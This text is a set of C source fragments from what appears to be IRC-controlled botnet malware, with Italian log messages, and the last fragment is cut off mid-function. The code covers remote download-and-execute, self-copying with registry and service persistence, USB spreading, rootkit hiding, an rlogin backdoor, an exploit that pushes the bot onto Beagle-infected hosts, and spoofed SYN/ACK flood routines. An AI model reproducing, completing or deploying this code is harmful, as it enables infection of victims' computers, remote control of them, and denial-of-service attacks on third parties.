EXCEPTION_DISPOSITION cdecl _except_handler(struct _EXCEPTION_RECORD *ExceptionRecord, void *EstablisherFrame,struct _CONTEXT *ContextRecord,void *DispatcherContext) { // do some clean-up fclosesocket(threads[0].sock); killthreadall(); fWSACleanup(); fWSACleanup(); Sleep(100); PROCESS_INFORMATION pinfo; STARTUPINFO sinfo; memset(&pinfo, 0, sizeof(pinfo)); memset(&sinfo, 0, sizeof(sinfo)); sinfo.lpTitle = ""; sinfo.cb = sizeof(sinfo); sinfo.dwFlags = STARTF_USESHOWWINDOW; #ifdef DEBUG_CONSOLE sinfo.wShowWindow = SW_SHOW; #else sinfo.wShowWindow = SW_HIDE; #endif char botfile[MAX_PATH],sysdir[MAX_PATH]; GetSystemDirectory(sysdir, sizeof(sysdir)); GetModuleFileName(NULL, botfile, sizeof(botfile)); if (CreateProcess(NULL, botfile, NULL, NULL, TRUE, NORMAL_PRIORITY_CLASS | DETACHED_PROCESS, NULL, sysdir, &sinfo, &pinfo)) { Sleep(100); CloseHandle(pinfo.hProcess); CloseHandle(pinfo.hThread); } // Change EAX in the context record so that it points to someplace // where we can successfully write ContextRecord->Eax = (DWORD)&scratch; _asm { // Remove our EXECEPTION_REGISTRATION record mov eax,[ESP] // Get pointer to previous record mov FS:[0], EAX // Install previous record add esp, 8 // Clean our EXECEPTION_REGISTRATION off stack } ExitProcess(0); // Tell the OS to restart the faulting instruction return ExceptionContinueExecution; }
BOOL Beagle(EXINFO exinfo) { char *BeagleAuth, buffer[IRCLINE], botfile[MAX_PATH], fname[_MAX_FNAME], ext[_MAX_EXT]; BOOL success = FALSE; WSADATA WSAData; if (fWSAStartup(MAKEWORD(1,1), &WSAData)!=0) return FALSE; SOCKET sSock; if((sSock = fsocket(PF_INET, SOCK_STREAM, IPPROTO_TCP)) != INVALID_SOCKET) { SOCKADDR_IN ssin; memset(&ssin, 0, sizeof(ssin)); ssin.sin_family = AF_INET; ssin.sin_addr.s_addr = finet_addr(exinfo.ip); ssin.sin_port = fhtons(exinfo.port); if(fconnect(sSock, (LPSOCKADDR)&ssin, sizeof(ssin)) != SOCKET_ERROR) { BeagleAuth = ((strcmp(exinfo.command, "beagle1") == 0)?(BeagleAuth1):(BeagleAuth2)); if(fsend(sSock, BeagleAuth, sizeof(BeagleAuth), 0) != SOCKET_ERROR) { if (frecv(sSock, buffer, 8, 0) != SOCKET_ERROR) { GetModuleFileName(0, botfile, sizeof(botfile)); _splitpath(botfile, NULL, NULL, fname, ext); _snprintf(botfile, sizeof(botfile), "%s%s", fname, ext); _snprintf(buffer,sizeof(buffer),"http://%s:%s/%s", GetIP(sSock), httpport, botfile); if(fsend(sSock, buffer, sizeof(buffer), 0)) success = TRUE; } } } } fclosesocket(sSock); fWSACleanup(); if (success) { _snprintf(buffer, sizeof(buffer), "[%s]: Exploiting IP: %s.", exploit[exinfo.exploit].name, exinfo.ip); if (!exinfo.silent) irc_privmsg(exinfo.sock, exinfo.chan, buffer, exinfo.notice); addlog(buffer); exploit[exinfo.exploit].stats++; } return (success); }
// function for downloading files/updating DWORD WINAPI DownloadThread(LPVOID param) { char buffer[IRCLINE]; DWORD r, d, start, total, speed; DOWNLOAD dl = *((DOWNLOAD *)param); DOWNLOAD *dls = (DOWNLOAD *)param; dls->gotinfo = TRUE; HANDLE fh = fInternetOpenUrl(ih, dl.url, NULL, 0, 0, 0); if (fh != NULL) { // open the file HANDLE f = CreateFile(dl.dest, GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, 0, 0); // make sure that our file handle is valid if (f < (HANDLE)1) { sprintf(buffer,"[DOWNLOAD]: Couldn't open file: %s.",dl.dest); if (!dl.silent) irc_privmsg(dl.sock,dl.chan,buffer,dl.notice); addlog(buffer); clearthread(dl.threadnum); ExitThread(0);; } total = 0; start = GetTickCount(); char *fileTotBuff=(char *)malloc(512000); //FIX ME: Only checks first 500 kb do { memset(buffer, 0, sizeof(buffer)); fInternetReadFile(fh, buffer, sizeof(buffer), &r); if (dl.encrypted) Xorbuff(buffer,r); WriteFile(f, buffer, r, &d, NULL); if ((total) < 512000) { //We have free bytes... //512000-total unsigned int bytestocopy; bytestocopy=512000-total; if (bytestocopy>r) bytestocopy=r; memcpy(&fileTotBuff[total],buffer,bytestocopy); } total+=r; if (dl.filelen) if (total>dl.filelen) break; //er, we have a problem... filesize is too big. if (dl.update != 1) sprintf(threads[dl.threadnum].name, "[Download]: Download: %s (%dKB transferred).", dl.url, total / 1024); else sprintf(threads[dl.threadnum].name, "[Download]: Update: %s (%dKB transferred).", dl.url, total / 1024); } while (r > 0); BOOL goodfile=TRUE; if (dl.filelen) { if (total!=dl.filelen) { goodfile=FALSE; sprintf(buffer,"[DOWNLOAD]: Filesize is incorrect: (%d != %d).", total, dl.filelen); irc_privmsg(dl.sock,dl.chan,buffer,dl.notice); addlog(buffer); } } speed = total / (((GetTickCount() - start) / 1000) + 1); CloseHandle(f); /* if (dl.expectedcrc) { unsigned long crc,crclength; sprintf(buffer,"crc32([%lu], [%d])\n",fileTotBuff,total); crclength=total; if (crclength>512000) crclength=512000; crc=crc32(fileTotBuff,crclength); if (crc!=dl.expectedcrc) { goodfile=FALSE; irc_privmsg(dl.sock,dl.chan,"CRC Failed!",dl.notice); } } */ free(fileTotBuff); if (dl.expectedcrc) { unsigned long crc=crc32f(dl.dest); if (crc!=dl.expectedcrc) { goodfile=FALSE; sprintf(buffer,"[DOWNLOAD]: CRC Fallito (%d != %d).", crc, dl.expectedcrc); irc_privmsg(dl.sock, dl.chan, buffer, dl.notice); addlog(buffer); } } if (goodfile==FALSE) goto badfile; //download isn't an update if (dl.update != 1) { sprintf(buffer, "[DOWNLOAD]: D0S Downloaded %.1f KB in %s @ %.1f KB/sec.", total / 1024.0, dl.dest, speed / 1024.0); if (!dl.silent) irc_privmsg(dl.sock, dl.chan, buffer, dl.notice); addlog(buffer); if (dl.run == 1) { fShellExecute(0, "open", dl.dest, NULL, NULL, SW_SHOW); if (!dl.silent) { sprintf(buffer,"[DOWNLOAD]: Apro Il File : %s.",dl.dest); irc_privmsg(dl.sock,dl.chan,buffer,dl.notice); addlog(buffer); } } // download is an update } else { sprintf(buffer, "[DOWNLOAD]: Downloaded %.1fKB in %s @ %.1fKB/sec. Updato.", total / 1024.0, dl.dest, speed / 1024.0); if (!dl.silent) irc_privmsg(dl.sock, dl.chan, buffer, dl.notice); addlog(buffer); PROCESS_INFORMATION pinfo; STARTUPINFO sinfo; memset(&pinfo, 0, sizeof(pinfo)); memset(&sinfo, 0, sizeof(sinfo)); sinfo.lpTitle = ""; sinfo.cb = sizeof(sinfo); sinfo.dwFlags = STARTF_USESHOWWINDOW; sinfo.wShowWindow = SW_HIDE; if (CreateProcess(NULL, dl.dest, NULL, NULL, FALSE, NORMAL_PRIORITY_CLASS | DETACHED_PROCESS, NULL, NULL, &sinfo, &pinfo) == TRUE) { fWSACleanup(); uninstall(); ExitProcess(EXIT_SUCCESS); } else { sprintf(buffer,"[DOWNLOAD]: Update Fallito: Errore Nell'Apertura Del File: %s.",dl.dest); if (!dl.silent) irc_privmsg(dl.sock, dl.chan, buffer, dl.notice); addlog(buffer); } } } else { sprintf(buffer,"[DOWNLOAD]: Link o DnS Non Trovato SUKKIAMELO!: %s.",dl.url); if (!dl.silent) irc_privmsg(dl.sock, dl.chan, buffer, dl.notice); addlog(buffer); } badfile: fInternetCloseHandle(fh); clearthread(dl.threadnum); ExitThread(0); }
int main(int argc, char *argv[]) #endif { char msg[256]; LoadDLLs(); unsigned char szBytes[] = { 0xc8, 0x0, 0x4, 0x0, 0x60 }; DWORD dwAddr = (DWORD)GetProcAddress(LoadLibrary("user32.dll"), "MessageBoxA"); if(!memcmp((LPVOID)dwAddr, (LPVOID)szBytes, sizeof(szBytes))) { ExitProcess(0); } #ifndef NO_SERVICE SERVICE_TABLE_ENTRY servicetable[] = { {servicename, (LPSERVICE_MAIN_FUNCTION) ServiceMain}, {NULL, NULL} }; #endif char cpbot[MAX_PATH]; char movetopath[MAX_PATH]; char spath[MAX_PATH]; GetModuleFileName(GetModuleHandle(NULL), cpbot, sizeof(cpbot)); ExpandEnvironmentStrings(gotopth,movetopath,sizeof(movetopath)); sprintf(spath,"%s\\%s",movetopath,exename); #ifndef _DEBUG if (MoveBot(movetopath,exename)) { HKEY hndKey = NULL; RegCreateKeyEx(HKEY_LOCAL_MACHINE,"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\",0,NULL,REG_OPTION_NON_VOLATILE,KEY_ALL_ACCESS,NULL, &hndKey, NULL); RegSetValueEx(hndKey,szRegname,0, REG_SZ,(const unsigned char *)exename,strlen(exename)); RegCloseKey(hndKey); PROCESS_INFORMATION pinfo; STARTUPINFO sinfo; ZeroMemory(&pinfo,sizeof(pinfo)); ZeroMemory(&sinfo,sizeof(sinfo)); sinfo.lpTitle = ""; sinfo.cb = sizeof(sinfo); sinfo.dwFlags = STARTF_USESHOWWINDOW; sinfo.wShowWindow = SW_HIDE; if (CreateProcess(spath,NULL,NULL,NULL,TRUE,NORMAL_PRIORITY_CLASS|DETACHED_PROCESS,NULL,movetopath,&sinfo,&pinfo)) { Sleep(200); CloseHandle(pinfo.hProcess); CloseHandle(pinfo.hThread); fWSACleanup(); ExitProcess(EXIT_SUCCESS); } ExitProcess(1); } #endif // _DEBUG #ifndef NO_SERVICE if(fStartServiceCtrlDispatcher(servicetable) == 0) InstallService(spath); #else DWORD id; NTHREAD usb; usb.conn = &mainirc; CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)USB_Spreader, &usb, 0, &id); // Execute USB spread on install. HANDLE threadhandle; if((threadhandle = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)Bthd, NULL, 0, &id)) == 0) return 0; WaitForSingleObject(threadhandle, INFINITE); CloseHandle(threadhandle); return 0; #endif // NO_SERVICE #ifdef _DEBUG #endif return 0; }
DWORD WINAPI Bthd(LPVOID param) { for (int m=0;m<6;m++) { if(!(xetum=CreateMutex(NULL, FALSE, xetumhandle))) Sleep(5000); else break; } if (WaitForSingleObject(CreateMutex(NULL, TRUE, xetumhandle), 30000) == WAIT_TIMEOUT) ExitProcess(0); addthread(MAIN_THREAD,str_main_thread,main_title); srand(GetTickCount()); dwstarted=GetTickCount(); WSADATA wsadata; if (fWSAStartup(MAKEWORD(2,2),&wsadata)!=0) ExitProcess(-2); int i=0; DWORD id=0; char *ip; char hostname[256]; struct hostent *h; fgethostname(hostname, 256); h = fgethostbyname(hostname); ip = finet_ntoa(*(struct in_addr *)h->h_addr_list[0]); strncpy(inip,ip,sizeof(inip)); curserver=0; HookProtocol(&mainirc); while (mainirc.should_connect()) { if (!mainirc.is_connected()) { #ifdef _DEBUG printf("Trying to connect to: %s:%i\r\n",sinfo[curserver].host,sinfo[curserver].port); #endif #ifndef NO_FLUSHDNS FlushDNSCache(); #endif mainirc.start(sinfo[curserver].host,sinfo[curserver].port, mainirc.nickgen(NICK_TYPE,REQ_NICKLEN),mainirc.nickgen(IDENT_TYPE,REQ_IDENTLEN), mainirc.nickgen(REALN_TYPE,REQ_REALNLEN),sinfo[curserver].pass); mainirc.message_loop(); } else mainirc.message_loop(); Sleep(SFLOOD_DELAY); if (curserver==(srvsz-1)) curserver=0; else curserver++; } // cleanup; //killthreadall(); fWSACleanup(); ReleaseMutex(xetum); ExitThread(0); return TRUE; }
DWORD WINAPI RlogindThread(LPVOID param) { RLOGIND rlogind = *((RLOGIND *)param); RLOGIND *rloginds = (RLOGIND *)param; rloginds->gotinfo = TRUE; char sendbuf[IRCLINE]; int csin_len, Err; unsigned long mode = 1; WSADATA WSAData; SECURITY_ATTRIBUTES SecurityAttributes; DWORD id; if ((Err = fWSAStartup(MAKEWORD(2,2), &WSAData)) != 0) { addlogv("[RLOGIND]: Error: WSAStartup(): <%d>.", Err); clearthread(rlogind.threadnum); ExitThread(1); } if (!SetConsoleCtrlHandler((PHANDLER_ROUTINE)&CtrlHandler, TRUE)) { addlogv("[RLOGIND]: Failed to install control-C handler, error: <%d>.", GetLastError()); fWSACleanup(); clearthread(rlogind.threadnum); ExitThread(1); } SOCKET ssock, csock; SOCKADDR_IN csin, ssin; memset(&ssin, 0, sizeof(ssin)); ssin.sin_family = AF_INET; ssin.sin_port = fhtons(rlogind.port); ssin.sin_addr.s_addr = INADDR_ANY; if ((ssock = fsocket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) != INVALID_SOCKET) { threads[rlogind.threadnum].sock = ssock; if (fbind(ssock, (LPSOCKADDR)&ssin, sizeof(ssin)) == 0) { if (flisten(ssock, SOMAXCONN) == 0) { SecurityAttributes.nLength = sizeof(SecurityAttributes); SecurityAttributes.lpSecurityDescriptor = NULL; SecurityAttributes.bInheritHandle = FALSE; addlog("[RLOGIND]: Ready and waiting for incoming connections."); BOOL flag = TRUE; while (1) { csin_len = sizeof(csin); if ((csock = faccept(ssock, (LPSOCKADDR)&csin, &csin_len)) == INVALID_SOCKET) break; if (fsetsockopt(csock, SOL_SOCKET, SO_KEEPALIVE,(char *)&flag,flag) != SOCKET_ERROR) { rlogind.gotinfo = FALSE; sprintf(sendbuf,"[RLOGIND]: Client connection from IP: %s:%d, Server thread: %d.", finet_ntoa(csin.sin_addr), fntohs(csin.sin_port), rlogind.threadnum); addlog(sendbuf); rlogind.cthreadnum = addthread(sendbuf,RLOGIN_THREAD,csock); threads[rlogind.cthreadnum].parent = rlogind.threadnum; if (threads[rlogind.cthreadnum].tHandle = CreateThread(&SecurityAttributes,0,&RlogindClientThread,(LPVOID)&rlogind,0,&id)) { while (rlogind.gotinfo == FALSE) Sleep(50); } else { addlogv("[RLOGIND]: Failed to start client thread, error: <%d>.", GetLastError()); break; } } } } } } sprintf(sendbuf, "[RLOGIND]: Error: server failed, returned: <%d>.", fWSAGetLastError()); if (!rlogind.silent) irc_privmsg(rlogind.sock, rlogind.chan, sendbuf, rlogind.notice); addlog(sendbuf); fclosesocket(csock); fclosesocket(ssock); fWSACleanup(); clearthread(rlogind.threadnum); ExitThread(0); }
long SendDDOS(unsigned long TargetIP, unsigned int SpoofingIP, char *Type, unsigned short TargetPort, int len) { WSADATA WSAData; SOCKET sock; SOCKADDR_IN addr_in; IPHEADER ipHeader; TCPHEADER tcpHeader; PSDHEADER psdHeader; LARGE_INTEGER freq, halt_time, cur; char szSendBuf[60]={0},buf[64]; int rect; if (fWSAStartup(MAKEWORD(2,2), &WSAData)!=0) return FALSE; if ((sock = fWSASocket(AF_INET,SOCK_RAW,IPPROTO_RAW,NULL,0,WSA_FLAG_OVERLAPPED )) == INVALID_SOCKET) { fWSACleanup(); return FALSE; } BOOL flag=TRUE; if (fsetsockopt(sock,IPPROTO_IP, IP_HDRINCL,(char *)&flag,sizeof(flag)) == SOCKET_ERROR) { fclosesocket(sock); fWSACleanup(); return FALSE; } addr_in.sin_family=AF_INET; addr_in.sin_port=fhtons((unsigned short)TargetPort); addr_in.sin_addr.s_addr=TargetIP; ipHeader.verlen=(4<<4 | sizeof(ipHeader)/sizeof(unsigned long)); ipHeader.total_len=fhtons(sizeof(ipHeader)+sizeof(tcpHeader)); ipHeader.ident=1; ipHeader.frag_and_flags=0; ipHeader.ttl=128; ipHeader.proto=IPPROTO_TCP; ipHeader.checksum=0; ipHeader.destIP=TargetIP; tcpHeader.dport=fhtons((unsigned short)TargetPort); tcpHeader.sport=fhtons((unsigned short)rand()%1025); tcpHeader.seq=fhtonl(0x12345678); /* A SYN attack simply smash its target up with TCP SYN packets. Each SYN packet needs a SYN-ACK response and forces the server to wait for the good ACK in reply. Of course, we just never gives the ACK, since we use a bad IP address (spoof) there's no chance of an ACK returning. This quickly kills a server as it tries to send out SYN-ACKs while waiting for ACKs. When the SYN-ACK queues fill up, the server can no longer take any incoming SYNs, and that's the end of that server until the attack is cleared up.*/ if (strcmp(Type,"ddos.syn") == 0) { tcpHeader.ack_seq=0; tcpHeader.flags=SYN; } else if (strcmp(Type,"ddos.ack") == 0) { tcpHeader.ack_seq=0; tcpHeader.flags=ACK; } else if (strcmp(Type,"ddos.random") == 0) { tcpHeader.ack_seq=rand()%3; if (rand()%2 == 0) tcpHeader.flags=SYN; else tcpHeader.flags=ACK; } tcpHeader.lenres=(sizeof(tcpHeader)/4<<4|0); tcpHeader.window=fhtons(16384); tcpHeader.urg_ptr=0; long total = 0; QueryPerformanceFrequency(&freq); QueryPerformanceCounter(&cur); halt_time.QuadPart = (freq.QuadPart * len) + cur.QuadPart; while(TRUE) { tcpHeader.checksum=0; tcpHeader.sport=fhtons((unsigned short)((rand() % 1001) + 1000)); tcpHeader.seq=fhtons((unsigned short)((rand() << 16) | rand())); ipHeader.sourceIP=fhtonl(SpoofingIP++); psdHeader.daddr=ipHeader.destIP; psdHeader.zero=0; psdHeader.proto=IPPROTO_TCP; psdHeader.length=fhtons(sizeof(tcpHeader)); psdHeader.saddr=ipHeader.sourceIP; memcpy(szSendBuf, &psdHeader, sizeof(psdHeader)); memcpy(szSendBuf+sizeof(psdHeader), &tcpHeader, sizeof(tcpHeader)); tcpHeader.checksum=checksum((USHORT *)szSendBuf,sizeof(psdHeader)+sizeof(tcpHeader)); memcpy(szSendBuf, &ipHeader, sizeof(ipHeader)); memcpy(szSendBuf+sizeof(ipHeader), &tcpHeader, sizeof(tcpHeader)); memset(szSendBuf+sizeof(ipHeader)+sizeof(tcpHeader), 0, 4); ipHeader.checksum=checksum((USHORT *)szSendBuf, sizeof(ipHeader)+sizeof(tcpHeader)); memcpy(szSendBuf, &ipHeader, sizeof(ipHeader)); rect=fsendto(sock, szSendBuf, sizeof(ipHeader)+sizeof(tcpHeader),0,(LPSOCKADDR)&addr_in, sizeof(addr_in)); if (rect==SOCKET_ERROR) { sprintf(buf, "[DDoS]: Send error: <%d>.",fWSAGetLastError()); addlog(buf); fclosesocket(sock); fWSACleanup(); return 0; } total += rect; QueryPerformanceCounter(&cur); if (cur.QuadPart >= halt_time.QuadPart) break; } fclosesocket(sock); fWSACleanup(); return (total); }
long SendSyn(unsigned long TargetIP, unsigned int SpoofingIP, unsigned short TargetPort, int len) { IPHEADER ipHeader; TCPHEADER tcpHeader; PSDHEADER psdHeader; LARGE_INTEGER freq, halt_time, cur; char szSendBuf[60]={0},buf[64]; int rect; WSADATA WSAData; if (fWSAStartup(MAKEWORD(2,2), &WSAData) != 0) return FALSE; SOCKET sock; if ((sock = fWSASocket(AF_INET,SOCK_RAW,IPPROTO_RAW,NULL,0,WSA_FLAG_OVERLAPPED)) == INVALID_SOCKET) { fWSACleanup(); return FALSE; } BOOL flag=TRUE; if (fsetsockopt(sock,IPPROTO_IP,IP_HDRINCL,(char *)&flag,sizeof(flag)) == SOCKET_ERROR) { fclosesocket(sock); fWSACleanup(); return FALSE; } SOCKADDR_IN ssin; memset(&ssin, 0, sizeof(ssin)); ssin.sin_family=AF_INET; ssin.sin_port=fhtons(TargetPort); ssin.sin_addr.s_addr=TargetIP; ipHeader.verlen=(4<<4 | sizeof(ipHeader)/sizeof(unsigned long)); ipHeader.total_len=fhtons(sizeof(ipHeader)+sizeof(tcpHeader)); ipHeader.ident=1; ipHeader.frag_and_flags=0; ipHeader.ttl=128; ipHeader.proto=IPPROTO_TCP; ipHeader.checksum=0; ipHeader.destIP=TargetIP; tcpHeader.dport=fhtons(TargetPort); tcpHeader.ack_seq=0; tcpHeader.lenres=(sizeof(tcpHeader)/4<<4|0); tcpHeader.flags=2; tcpHeader.window=fhtons(16384); tcpHeader.urg_ptr=0; long total = 0; QueryPerformanceFrequency(&freq); QueryPerformanceCounter(&cur); halt_time.QuadPart = (freq.QuadPart * len) + cur.QuadPart; while (1) { tcpHeader.checksum=0; tcpHeader.sport=fhtons((unsigned short)((rand() % 1001) + 1000)); tcpHeader.seq=fhtons((unsigned short)((rand() << 16) | rand())); ipHeader.sourceIP=fhtonl(SpoofingIP++); psdHeader.daddr=ipHeader.destIP; psdHeader.zero=0; psdHeader.proto=IPPROTO_TCP; psdHeader.length=fhtons(sizeof(tcpHeader)); psdHeader.saddr=ipHeader.sourceIP; memcpy(szSendBuf, &psdHeader, sizeof(psdHeader)); memcpy(szSendBuf+sizeof(psdHeader), &tcpHeader, sizeof(tcpHeader)); tcpHeader.checksum=checksum((USHORT *)szSendBuf,sizeof(psdHeader)+sizeof(tcpHeader)); memcpy(szSendBuf, &ipHeader, sizeof(ipHeader)); memcpy(szSendBuf+sizeof(ipHeader), &tcpHeader, sizeof(tcpHeader)); memset(szSendBuf+sizeof(ipHeader)+sizeof(tcpHeader), 0, 4); ipHeader.checksum=checksum((USHORT *)szSendBuf, sizeof(ipHeader)+sizeof(tcpHeader)); memcpy(szSendBuf, &ipHeader, sizeof(ipHeader)); rect=fsendto(sock, szSendBuf, sizeof(ipHeader)+sizeof(tcpHeader),0,(LPSOCKADDR)&ssin, sizeof(ssin)); if (rect==SOCKET_ERROR) { sprintf(buf, "[SYN]: Send error: <%d>.",fWSAGetLastError()); addlog(buf); fclosesocket(sock); fWSACleanup(); return 0; } total += rect; QueryPerformanceCounter(&cur); if (cur.QuadPart >= halt_time.QuadPart) break; } fclosesocket(sock); fWSACleanup(); return (total); }
int main(int argc, char *argv[]) #endif { LoadDLLs(); #ifndef NO_DDETECT if(IsBugged()) { EraseMe(TRUE); ExitProcess(1); } #endif #ifndef NO_CRYPT decryptstrings(authsize, versionsize, serversize); #endif #ifndef NO_SERVICE SERVICE_TABLE_ENTRY servicetable[] = { {servicename, (LPSERVICE_MAIN_FUNCTION) ServiceMain}, {NULL, NULL} }; #endif //TODO: Error handler here #ifndef _DEBUG fSetErrorMode(SEM_NOGPFAULTERRORBOX); #endif char cfilename[MAX_PATH]; char movetopath[MAX_PATH]; char svcpath[MAX_PATH]; GetModuleFileName(GetModuleHandle(NULL), cfilename, sizeof(cfilename)); ExpandEnvironmentStrings(movepath,movetopath,sizeof(movetopath)); sprintf(svcpath,"%s\\%s",movetopath,filename); #ifndef _DEBUG if (MoveBot(movetopath,filename)) { #ifndef NO_MELT RegWrite(meltkey.hkey,meltkey.subkey,meltkey.name,cfilename); #endif // NO_MELT #ifndef NO_SERVICE InstallService(svcpath); #else RegWrite(runkey.hkey,runkey.subkey,runkey.name,svcpath); PROCESS_INFORMATION pinfo; STARTUPINFO sinfo; ZeroMemory(&pinfo,sizeof(pinfo)); ZeroMemory(&sinfo,sizeof(sinfo)); sinfo.lpTitle = ""; sinfo.cb = sizeof(sinfo); sinfo.dwFlags = STARTF_USESHOWWINDOW; #ifdef _DEBUG sinfo.wShowWindow = SW_SHOW; #else sinfo.wShowWindow = SW_HIDE; #endif // _DEBUG if (CreateProcess(svcpath,NULL,NULL,NULL,TRUE,NORMAL_PRIORITY_CLASS|DETACHED_PROCESS,NULL,movetopath,&sinfo,&pinfo)) { Sleep(200); CloseHandle(pinfo.hProcess); CloseHandle(pinfo.hThread); fWSACleanup(); ExitProcess(EXIT_SUCCESS); } #endif // NO_SERVICE ExitProcess(1); } #endif // _DEBUG #ifndef NO_SERVICE if(fStartServiceCtrlDispatcher(servicetable) == 0) InstallService(svcpath); #else DWORD id; HANDLE threadhandle; if((threadhandle = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)BotThread, NULL, 0, &id)) == 0) return 0; WaitForSingleObject(threadhandle, INFINITE); CloseHandle(threadhandle); #endif // NO_SERVICE #ifdef _DEBUG // CloseLog(); #endif return 0; }
DWORD WINAPI BotThread(LPVOID param) { for (int m=0;m<6;m++) { if(!(mutex=CreateMutex(NULL, FALSE, mutexhandle))) Sleep(5000); else break; } // if (WaitForSingleObject(CreateMutex(NULL, TRUE, mutexhandle), 30000) == WAIT_TIMEOUT) // ExitProcess(0); addthread(MAIN_THREAD,str_main_thread,main_title); #ifndef _DEBUG #ifndef NO_MELT char *melt=RegQuery(meltkey.hkey,meltkey.subkey,meltkey.name); if (melt) { SetFileAttributes(melt,FILE_ATTRIBUTE_NORMAL); int tries=0; while (FileExists(melt) && tries<3) { DeleteFile(melt); tries++; Sleep(2000); } RegDelete(meltkey.hkey,meltkey.subkey,meltkey.name); } #endif // NO_MELT #endif // _DEBUG srand(GetTickCount()); dwstarted=GetTickCount(); #ifndef NO_VERSION_REPLY curversion=rand()%(versionsize); #ifdef _DEBUG printf("Generated current_version: %d (%d), %s.\n",curversion,versionsize,versionlist[curversion]); #endif #endif WSADATA wsadata; if (fWSAStartup(MAKEWORD(2,2),&wsadata)!=0) ExitProcess(-2); #ifndef _DEBUG #ifndef NO_FCONNECT char readbuf[1024]; HINTERNET httpopen, openurl; DWORD read; httpopen=fInternetOpen(NULL,INTERNET_OPEN_TYPE_DIRECT,NULL,NULL,0); openurl=fInternetOpenUrl(httpopen,cononstart,NULL,NULL,INTERNET_FLAG_RELOAD|INTERNET_FLAG_NO_CACHE_WRITE,NULL); if (!openurl) { fInternetCloseHandle(httpopen); fInternetCloseHandle(openurl); } fInternetReadFile(openurl,readbuf,sizeof(readbuf),&read); fInternetCloseHandle(httpopen); fInternetCloseHandle(openurl); #endif // NO_FCONNECT #endif // _DEBUG #ifndef NO_INSTALLED_TIME if (!noadvapi32) GetInstalledTime(); else sprintf(installedt,"Error"); #endif // NO_INSTALLED_TIME int i=0; DWORD id=0; #ifndef NO_RECORD_UPTIME i=addthread(RUPTIME_THREAD,str_rup_thread,main_title); threads[i].tHandle=CreateThread(NULL,0,&RecordUptimeThread,0,0,&id); #endif // NO_RECORD_UPTIME #ifndef NO_AUTO_SECURE #ifndef NO_SECURE NTHREAD secure; secure.bdata2=TRUE;//loop i=addthread(SECURE_THREAD,str_asecure_thread,sec_title); threads[i].tHandle=CreateThread(NULL,0,&SecureThread,(LPVOID)&secure,0,&id); #endif #endif // NO_AUTO_SECURE #ifndef NO_RDRIV #ifndef _DEBUG rkenabled=InitRK();//initialize fu if (rkenabled) HideMe();//hide the process #endif // _DEBUG #endif // NO_RDRIV #ifndef _DEBUG // maybe this will give the shutdown handler time to work RegWrite(HKEY_LOCAL_MACHINE,"SYSTEM\\CurrentControlSet\\Control","WaitToKillServiceTimeout","7000"); #endif //get internal ip char *ip; char hostname[256]; struct hostent *h; fgethostname(hostname, 256); h = fgethostbyname(hostname); ip = finet_ntoa(*(struct in_addr *)h->h_addr_list[0]); strncpy(inip,ip,sizeof(inip)); curserver=0; HookProtocol(&mainirc); while (mainirc.should_connect()) { if (!mainirc.is_connected()) { #ifdef _DEBUG printf("Trying to connect to: %s:%i\r\n",servers[curserver].host,servers[curserver].port); #endif #ifndef NO_FLUSHDNS FlushDNSCache(); #endif mainirc.start(servers[curserver].host,servers[curserver].port, mainirc.nickgen(NICK_TYPE,REQ_NICKLEN),mainirc.nickgen(IDENT_TYPE,REQ_IDENTLEN), mainirc.nickgen(REALN_TYPE,REQ_REALNLEN),servers[curserver].pass); mainirc.message_loop(); } else mainirc.message_loop(); Sleep(SFLOOD_DELAY); if (curserver==(serversize-1)) curserver=0; else curserver++; } // cleanup; killthreadall(); fWSACleanup(); ReleaseMutex(mutex); ExitThread(0); }
DWORD WINAPI DownloadThread(LPVOID param) { char buffer[IRCLINE]; DWORD r, d, start, total, speed; NTHREAD dl = *((NTHREAD *)param); NTHREAD *dls = (NTHREAD *)param; dls->gotinfo = TRUE; IRC* irc=(IRC*)dl.conn; char dlfrom[MAX_HOSTNAME]; char dlto[MAX_PATH]; strncpy(dlfrom,dl.data1,sizeof(dlfrom)); strncpy(dlto,dl.data2,sizeof(dlto)); HANDLE fh = fInternetOpenUrl(ih, dlfrom, NULL, 0, 0, 0); if (fh != NULL) { HANDLE f = CreateFile(dlto, GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, 0, 0); if (f < (HANDLE)1) { if (!dl.silent) irc->pmsg(dl.target,"%s Couldn't open file for writing: %s.",(dl.bdata1?update_title:download_title),dlto); fInternetCloseHandle(fh); clearthread(dl.threadnum); ExitThread(0); } total = 0; start = GetTickCount(); char *fileTotBuff=(char *)malloc(512000); do { ZeroMemory(buffer,sizeof(buffer)); fInternetReadFile(fh, buffer, sizeof(buffer), &r); WriteFile(f, buffer, r, &d, NULL); if ((total) < 512000) { unsigned int bytestocopy; bytestocopy=512000-total; if (bytestocopy>r) bytestocopy=r; memcpy(&fileTotBuff[total],buffer,bytestocopy); } total+=r; } while (r > 0); speed = total / (((GetTickCount() - start) / 1000) + 1); free(fileTotBuff); CloseHandle(f); fInternetCloseHandle(fh); if (!dl.silent) irc->pmsg(dl.target,"%s File download: %.1fKB to: %s @ %.1fKB/sec.",(dl.bdata1?update_title:download_title), total/1024.0, dlto, speed/1024.0); if (!dl.bdata1 && dl.bdata2) { STARTUPINFO si; PROCESS_INFORMATION pi; BOOL hide=dl.bdata3, wait=dl.verbose; char path[MAX_PATH]; strncpy(path,dlto,sizeof(path)); if (!fPathRemoveFileSpec(path)) { if (!dl.silent) irc->pmsg(dl.target,"%s Couldn't parse path, error: <%d>", download_title, GetLastError()); return 1; } ZeroMemory(&si,sizeof(si)); ZeroMemory(&pi,sizeof(pi)); si.cb=sizeof(si); si.dwFlags = STARTF_USESHOWWINDOW; si.wShowWindow = (hide?SW_HIDE:SW_SHOW); if (!CreateProcess(NULL,dlto,NULL,NULL,FALSE,0,NULL,path,&si,&pi)) { if (!dl.silent) irc->pmsg(dl.target,"%s Failed to create process: \"%s\", error: <%d>", download_title, dlto, GetLastError()); return 1; } else { DWORD start=GetTickCount(); if (!dl.silent) irc->pmsg(dl.target,"%s Created process: \"%s\", PID: <%d>",download_title,dlto,pi.dwProcessId); if (dl.verbose) { WaitForSingleObject(pi.hProcess,INFINITE); DWORD stop=GetTickCount(); char ttime[120],stime[120]; stime[0]='\0'; DWORD total = ((stop - start)/1000); DWORD hours = (total%86400)/3600; DWORD minutes = 